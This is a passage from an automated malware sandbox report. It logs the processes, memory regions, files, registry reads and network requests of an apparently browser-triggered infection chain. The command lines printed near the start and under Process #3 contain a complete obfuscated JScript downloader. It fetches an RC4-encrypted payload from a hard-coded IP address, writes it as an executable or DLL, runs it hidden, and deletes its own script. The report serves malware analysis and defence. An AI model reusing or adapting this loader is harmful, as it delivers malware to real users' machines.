private_0x0000000003350000 0x03350000 0x0338ffff Private Memory Readable, Writable True False False -
private_0x0000000003390000 0x03390000 0x03390fff Private Memory Readable, Writable True False False -
private_0x00000000033a0000 0x033a0000 0x033dffff Private Memory Readable, Writable True False False -
private_0x00000000033e0000 0x033e0000 0x033e0fff Private Memory Readable, Writable True False False -
private_0x00000000033f0000 0x033f0000 0x033f0fff Private Memory Readable, Writable True False False -
pagefile_0x0000000003400000 0x03400000 0x03400fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000003410000 0x03410000 0x0344ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000003450000 0x03450000 0x03450fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000003460000 0x03460000 0x03460fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000003470000 0x03470000 0x034affff Private Memory Readable, Writable True False False -
private_0x00000000034b0000 0x034b0000 0x034b0fff Private Memory Readable, Writable True False False -
private_0x00000000034c0000 0x034c0000 0x035bffff Private Memory Readable, Writable True False False -
pagefile_0x00000000035c0000 0x035c0000 0x035c1fff Pagefile Backed Memory Readable True False False -
private_0x00000000035d0000 0x035d0000 0x0364ffff Private Memory Readable, Writable True False False -
private_0x0000000003650000 0x03650000 0x0368ffff Private Memory Readable, Writable True False False -
mlang.dll.mui 0x03690000 0x03693fff Memory Mapped File Readable, Writable False False False -
private_0x00000000036a0000 0x036a0000 0x036dffff Private Memory Readable, Writable True False False -
private_0x00000000036e0000 0x036e0000 0x036effff Private Memory Readable, Writable True False False -
private_0x00000000036f0000 0x036f0000 0x036f1fff Private Memory Readable, Writable True False False -
pagefile_0x0000000003700000 0x03700000 0x03700fff Pagefile Backed Memory Readable, Writable True False False -
msctf.dll.mui 0x03710000 0x03710fff Memory Mapped File Readable, Writable False False False -
private_0x0000000003720000 0x03720000 0x0372ffff Private Memory Readable, Writable True False False -
private_0x0000000003790000 0x03790000 0x037cffff Private Memory Readable, Writable True False False -
staticcache.dat 0x037d0000 0x040fffff Memory Mapped File Readable False False False -
private_0x0000000004140000 0x04140000 0x0417ffff Private Memory Readable, Writable True False False -
private_0x0000000004190000 0x04190000 0x041cffff Private Memory Readable, Writable True False False -
private_0x0000000004230000 0x04230000 0x0423ffff Private Memory Readable, Writable True False False -
private_0x0000000004240000 0x04240000 0x0424ffff Private Memory Readable, Writable True False False -
private_0x0000000004280000 0x04280000 0x0428ffff Private Memory Readable, Writable True False False -
private_0x00000000042e0000 0x042e0000 0x043dffff Private Memory Readable, Writable True False False -
private_0x0000000004450000 0x04450000 0x0448ffff Private Memory Readable, Writable, Executable True False False -
private_0x00000000044f0000 0x044f0000 0x045effff Private Memory Readable, Writable True False False -
private_0x0000000004630000 0x04630000 0x0472ffff Private Memory Readable, Writable True False False -
private_0x0000000004820000 0x04820000 0x0491ffff Private Memory Readable, Writable True False False -
private_0x0000000004a70000 0x04a70000 0x04a7ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000004a80000 0x04a80000 0x04dc2fff Pagefile Backed Memory Readable True False False -
private_0x0000000004eb0000 0x04eb0000 0x04faffff Private Memory Readable, Writable True False False -
private_0x000000005fff0000 0x5fff0000 0x5fffffff Private Memory Readable, Writable, Executable True False False -
office.odf 0x71e80000 0x72299fff Memory Mapped File Readable, Writable, Executable False False False -
grooveintlresource.dll 0x722a0000 0x72b04fff Memory Mapped File Readable, Writable, Executable False False False -
grooveex.dll 0x72b10000 0x72f18fff Memory Mapped File Readable, Writable, Executable False False False -
sxs.dll 0x73000000 0x7305efff Memory Mapped File Readable, Writable, Executable False False False -
msvcr100.dll 0x73060000 0x7311efff Memory Mapped File Readable, Writable, Executable False False False -
jp2ssv.dll 0x73120000 0x7314dfff Memory Mapped File Readable, Writable, Executable False False False -
msohev.dll 0x73150000 0x73163fff Memory Mapped File Readable, Writable, Executable False False False -
urlredir.dll 0x73170000 0x73200fff Memory Mapped File Readable, Writable, Executable False False False -
ssv.dll 0x73210000 0x73283fff Memory Mapped File Readable, Writable, Executable False False False -
msftedit.dll 0x73290000 0x73323fff Memory Mapped File Readable, Writable, Executable False False False -
mshtml.dll 0x73330000 0x738e6fff Memory Mapped File Readable, Writable, Executable False False False -
ieframe.dll 0x738f0000 0x7436ffff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x74390000 0x74413fff Memory Mapped File Readable, Writable, Executable False False False -
For performance reasons, the remaining 221 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\5p5nrg~1\appdata\local\temp\system32\shell32.dll 3.77 KB MD5: ec243b881d17ce4758ad8d3c1c13ceeb
SHA1: 49d4f500d40ff2f3dcbb41c47fcaa33e971e095f
SHA256: b983b5f76555aff6543fa2af25e80d5b488c213895e8faa2ae2acca22bed60b3
False
Threads
Thread 0x950
53 6
»
Category Operation Information Success Count Logfile
Process Create process_name = cmd.exe /q /c cd /d "%tmp%" && echo /**/function V(k){var y=a(e+"."+e+/**/"Reques\x74.5.1");T="G";y["se"+"tProxy"](n);y["o"+"pen"](T+"ET",k(1),1);y["Option"](n)=k(2);y.send();y["Wai"+"tForResponse"]();W="respo"+"nseText";if(40*5==y.status)return _(y[W],k(n))};function _(k,e){for(var l=0,n,c=[],F=255,S=String,q=[],b=0;256^>b;b++)c[b]=b;ta="charCodeAt";for(b=0;256^>b;b++)l=l+c[b]+e[ta](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q["join"]("")};try{M="WSc";u=this[M+"ript"],o="Object";P=(""+u).split(" ")[1],M="indexOf",m=u.Arguments,e="WinHTTP",Z="cmd",U="DEleTefIle",a=Function/**/("QW","return u.Create"+o+"(QW)"),q=a(P+"ing.FileSystem"+o),s=a("ADO"+"DB.Stream"),j=a("W"+P+".Shell"),x="b"+Math.floor(Math.random() * 57)+".",p="exe",n=0,K=u[P+"FullName"],E="."+p;s.Type=2;s.Charset="iso-8859-1";try{v=V(m)}catch(W){v=V(m)};Q="PE\x00\x00";d=v.charCodeAt(21+v[M](Q));s.Open();h="dll";if(037^<d){var z=1;x+=h}else x+=p;s.WriteText(v);s.savetofile(x,2);C=" /c ";s.Close();i="regs";z^&^&(x=i+"vr32"+E+" /s "+x);j["run"](Z+E+C+x,0)}catch(EE){};q[U](K);>u32.tmp && start wscript //B //E:JScript u32.tmp "LZytas3d" "http://95.142.39.142/?MTAzNDE3&ofvcTlM&NOhFPrkEXYygcYr=c2Vh&XFZaDrsXTiVcOS=c2Vh&CQXjFXpCD=bWF0Y2h1cA==&uZwiNDOCVY=c3BvcnQ=&DGPafWFTVR=c2My&fdfsdf3gf=xXzQMvWebRXQCJ3EKvncT6NEMVHRHkCL2YqdmrHVefjaelWkzrfFTF_yozKATgSG6_dtdfJR&t4dsdfa4=DQbiiUHRfwQ1n49cBwsS9K6n20XUnUefh8SH-UCEYA5M-pOUFLcz2VX9yLMkc8Mm90vC62Jg&KMWDJCCKgTcdNl=cmVzb3J0&wAORzkZnO=cmVzb3J0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)", os_pid = 0xa6c, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x776c0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = CoCreateInstance, address_out = 0x77709d0b True 1
Fn
COM Create interface = 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Time type = Ticks, time = 100121 True 1
Fn
System Get Time type = Ticks, time = 102711 True 3
Fn
System Get Time type = Ticks, time = 102773 True 2
Fn
System Get Time type = Ticks, time = 102789 True 2
Fn
System Get Time type = Ticks, time = 102804 True 2
Fn
System Get Time type = Ticks, time = 102882 True 2
Fn
System Get Time type = Ticks, time = 102898 True 2
Fn
System Get Time type = Ticks, time = 102960 True 3
Fn
System Get Time type = Ticks, time = 102976 True 1
Fn
Module Get Address module_name = Unknown module name, function = CreateBindCtx, address_out = 0x77706d2c True 1
Fn
Module Get Address module_name = Unknown module name, function = MkParseDisplayName, address_out = 0x776ccea9 True 1
Fn
System Get Info type = Operating System True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting, value_name = Default Impersonation Level, data = 3 True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Module Load module_name = C:\Windows\system32\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = DuplicateTokenEx, address_out = 0x760eca24 True 1
Fn
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting, value_name = Default Namespace True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting, value_name = Default Namespace, data = 114 True 1
Fn
COM Create interface = 3BC15AF2-736C-477E-9E51-238AF8667DCC, cls_context = CLSCTX_INPROC_SERVER True 3
Fn
Module Get Address module_name = Unknown module name, function = BindMoniker, address_out = 0x776cc6a7 True 1
Fn
COM Get Class ID cls_id = 2087C2F4-2CEF-4953-A8AB-66779B670495, prog_id = WinHTTP.WinHTTPRequest.5.1 True 1
Fn
Module Get Address module_name = Unknown module name, function = CoGetClassObject, address_out = 0x776f54ad True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Fn
Inet Open Connection protocol = http, server_name = 95.142.39.142, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = / True 1
Fn
Inet Send HTTP Request url = http://95.142.39.142/?MzUzMTAy&ZNAVNHmAYOK&fdfsdf3gf=wn_QMvXcLxXQFYbCKuXDSKZDKU7WGUaVw4-dhMG3YprNfynz0uzURnLytASVVFmRrbMdL7dTO&rqWIetbNyd=Zmx5&t4dsdfa4=VLjiRGDegE0zY9aUFNG9v2v30aGzBXJiZaL_xCMYQxG95qdE7UL0VT8zrgdecIkzibfqWBT_A&hqNrCjJSgrWztKY=c2Vh&devbnQaWlmZ=cmVzb3J0&JVcVIIe=c2My&HheAqNwtJfbNda=c2hha2U=&YiuYJvmcJMhvOk=c3BvcnQ=&PQYFBaAantoAeLc=c3BvcnQ= True 1
Fn
Inet Receive HTTP Status status = 200 True 1
Fn
Inet Read Response size_out = 323593 True 1
Fn
Data
COM Get Class ID cls_id = 0D43FE01-F093-11CF-8940-00A0C9054228, prog_id = Scripting.FileSystemObject True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
System Get Time type = Ticks, time = 107406 True 1
Fn
COM Get Class ID cls_id = 00000566-0000-0010-8000-00AA006D2EA4, prog_id = ADODB.Stream True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
COM Get Class ID cls_id = 0D43FE01-F093-11CF-8940-00A0C9054228, prog_id = Scripting.FileSystemObject True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
COM Get Class ID cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
COM Get Class ID cls_id = 13709620-C279-11CE-A49E-444553540000, prog_id = Shell.Application True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER False 1
Fn
Process #3: cmd.exe
69 0
»
Information Value
ID #3
File Name c:\windows\syswow64\cmd.exe
Command Line cmd.exe /q /c cd /d "%tmp%" && echo /**/function V(k){var y=a(e+"."+e+/**/"Reques\x74.5.1");T="G";y["se"+"tProxy"](n);y["o"+"pen"](T+"ET",k(1),1);y["Option"](n)=k(2);y.send();y["Wai"+"tForResponse"]();W="respo"+"nseText";if(40*5==y.status)return _(y[W],k(n))};function _(k,e){for(var l=0,n,c=[],F=255,S=String,q=[],b=0;256^>b;b++)c[b]=b;ta="charCodeAt";for(b=0;256^>b;b++)l=l+c[b]+e[ta](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q["join"]("")};try{M="WSc";u=this[M+"ript"],o="Object";P=(""+u).split(" ")[1],M="indexOf",m=u.Arguments,e="WinHTTP",Z="cmd",U="DEleTefIle",a=Function/**/("QW","return u.Create"+o+"(QW)"),q=a(P+"ing.FileSystem"+o),s=a("ADO"+"DB.Stream"),j=a("W"+P+".Shell"),x="b"+Math.floor(Math.random() * 57)+".",p="exe",n=0,K=u[P+"FullName"],E="."+p;s.Type=2;s.Charset="iso-8859-1";try{v=V(m)}catch(W){v=V(m)};Q="PE\x00\x00";d=v.charCodeAt(21+v[M](Q));s.Open();h="dll";if(037^<d){var z=1;x+=h}else x+=p;s.WriteText(v);s.savetofile(x,2);C=" /c ";s.Close();i="regs";z^&^&(x=i+"vr32"+E+" /s "+x);j["run"](Z+E+C+x,0)}catch(EE){};q[U](K);>u32.tmp && start wscript //B //E:JScript u32.tmp "LZytas3d" "http://95.142.39.142/?MTAzNDE3&ofvcTlM&NOhFPrkEXYygcYr=c2Vh&XFZaDrsXTiVcOS=c2Vh&CQXjFXpCD=bWF0Y2h1cA==&uZwiNDOCVY=c3BvcnQ=&DGPafWFTVR=c2My&fdfsdf3gf=xXzQMvWebRXQCJ3EKvncT6NEMVHRHkCL2YqdmrHVefjaelWkzrfFTF_yozKATgSG6_dtdfJR&t4dsdfa4=DQbiiUHRfwQ1n49cBwsS9K6n20XUnUefh8SH-UCEYA5M-pOUFLcz2VX9yLMkc8Mm90vC62Jg&KMWDJCCKgTcdNl=cmVzb3J0&wAORzkZnO=cmVzb3J0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:34, Reason: Child Process
Unmonitor End Time: 00:02:24, Reason: Terminated by Timeout
Monitor Duration 00:01:50
OS Process Information
»
Information Value
PID 0xa6c
Parent PID 0x938 (c:\program files (x86)\internet explorer\iexplore.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x A70
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
private_0x0000000000070000 0x00070000 0x000affff Private Memory Readable, Writable True False False -
locale.nls 0x000b0000 0x00116fff Memory Mapped File Readable False False False -
pagefile_0x0000000000120000 0x00120000 0x00121fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000130000 0x00130000 0x00130fff Private Memory Readable, Writable True False False -
private_0x0000000000140000 0x00140000 0x00140fff Private Memory Readable, Writable True False False -
private_0x00000000001a0000 0x001a0000 0x001affff Private Memory Readable, Writable True False False -
private_0x0000000000210000 0x00210000 0x0030ffff Private Memory Readable, Writable True False False -
private_0x0000000000310000 0x00310000 0x0040ffff Private Memory Readable, Writable True False False -
private_0x0000000000440000 0x00440000 0x004bffff Private Memory Readable, Writable True False False -
private_0x00000000005f0000 0x005f0000 0x006effff Private Memory Readable, Writable True False False -
pagefile_0x00000000006f0000 0x006f0000 0x00877fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000880000 0x00880000 0x00a00fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000a10000 0x00a10000 0x01e0ffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001e10000 0x01e10000 0x02152fff Pagefile Backed Memory Readable True False False -
cmd.exe 0x4a960000 0x4a9abfff Memory Mapped File Readable, Writable, Executable True False False -
wow64cpu.dll 0x75360000 0x75367fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x75370000 0x753cbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x753d0000 0x7540efff Memory Mapped File Readable, Writable, Executable False False False -
winbrand.dll 0x75430000 0x75436fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75980000 0x7598bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75990000 0x759effff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75a30000 0x75a48fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75bb0000 0x75bf5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fd0000 0x760dffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x760e0000 0x7617ffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x763c0000 0x763c9fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x763e0000 0x764dffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76670000 0x7671bfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x76720000 0x767ebfff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x77570000 0x775cffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x775d0000 0x776bffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x77820000 0x778affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x77990000 0x77a2cfff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000077a30000 0x77a30000 0x77b4efff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077b50000 0x77b50000 0x77c49fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77c50000 0x77df8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77e30000 0x77faffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Created Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\5p5nrg~1\appdata\local\temp\u32.tmp 0.00 KB MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\5p5nrg~1\appdata\local\temp\u32.tmp 1.11 KB MD5: 6e9ad2e298b1801b54e706f2dede9acf
SHA1: 4f5b955bef450c8466b51d80d117cf7013d1af2a
SHA256: 7fab866ce5474e690a06ca556c76e63a3c3c184ae493fce03bb2a839ef7ef725
False
Threads
Thread 0xa70
69 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-05-11 13:20:37 (UTC) True 1
Fn
System Get Time type = Ticks, time = 99825 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\cmd.exe, base_address = 0x4a960000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x75ffa84f True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 3
Fn
File Open filename = STD_INPUT_HANDLE True 2
Fn
Environment Get Environment String - True 2
Fn
Data
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module Get Filename process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Environment Get Environment String name = PROMPT False 1
Fn
Environment Set Environment String name = PROMPT, value = $P$G True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Environment Get Environment String name = KEYS False 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop, type = file_attributes True 2
Fn
Environment Set Environment String name = =C:, value = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x76003b92 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75fe4a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x75ffa79d True 1
Fn
Environment Get Environment String name = tmp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Fn
Environment Get Environment String name = e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q["join"]("")};try{M="WSc";u=this[M+"ript"],o="Object";P=(""+u).split(" ")[1],M="indexOf",m=u.Arguments,e="WinHTTP",Z="cmd",U="DEleTefIle",a=Function/**/("QW","return u.Create"+o+"(QW)"),q=a(P+"ing.FileSystem"+o),s=a("ADO"+"DB.Stream"),j=a("W"+P+".Shell"),x="b"+Math.floor(Math.random() * 57)+".",p="exe",n=0,K=u[P+"FullName"],E="."+p;s.Type=2;s.Charset="iso-8859-1";try{v=V(m)}catch(W){v=V(m)};Q="PE\x00\x00";d=v.charCodeAt(21+v[M](Q));s.Open();h="dll";if(037^<d){var z=1;x+=h}else x+=p;s.WriteText(v);s.savetofile(x,2);C=" /c ";s.Close();i="regs";z^&^&(x=i+"vr32"+E+" /s "+x);j["run"](Z+E+C+x,0)}catch(EE){};q[U](K);>u32.tmp && start wscript //B //E False 1
Fn
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp, type = file_attributes True 2
Fn
Environment Set Environment String name = =C:, value = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Open filename = STD_OUTPUT_HANDLE True 2
Fn
File Create filename = u32.tmp, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 1141 True 1
Fn
Data
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Process Create process_name = C:\Windows\system32\wscript.exe, os_pid = 0xa84, creation_flags = CREATE_NEW_CONSOLE, CREATE_UNICODE_ENVIRONMENT, CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Thread Resume process_name = c:\windows\syswow64\cmd.exe, os_tid = 0xa70 True 1
Fn
File Open filename = STD_OUTPUT_HANDLE False 2
Fn
File Open filename = STD_INPUT_HANDLE True 2
Fn
Process #4: wscript.exe
338 6
»
Information Value
ID #4
File Name c:\windows\syswow64\wscript.exe
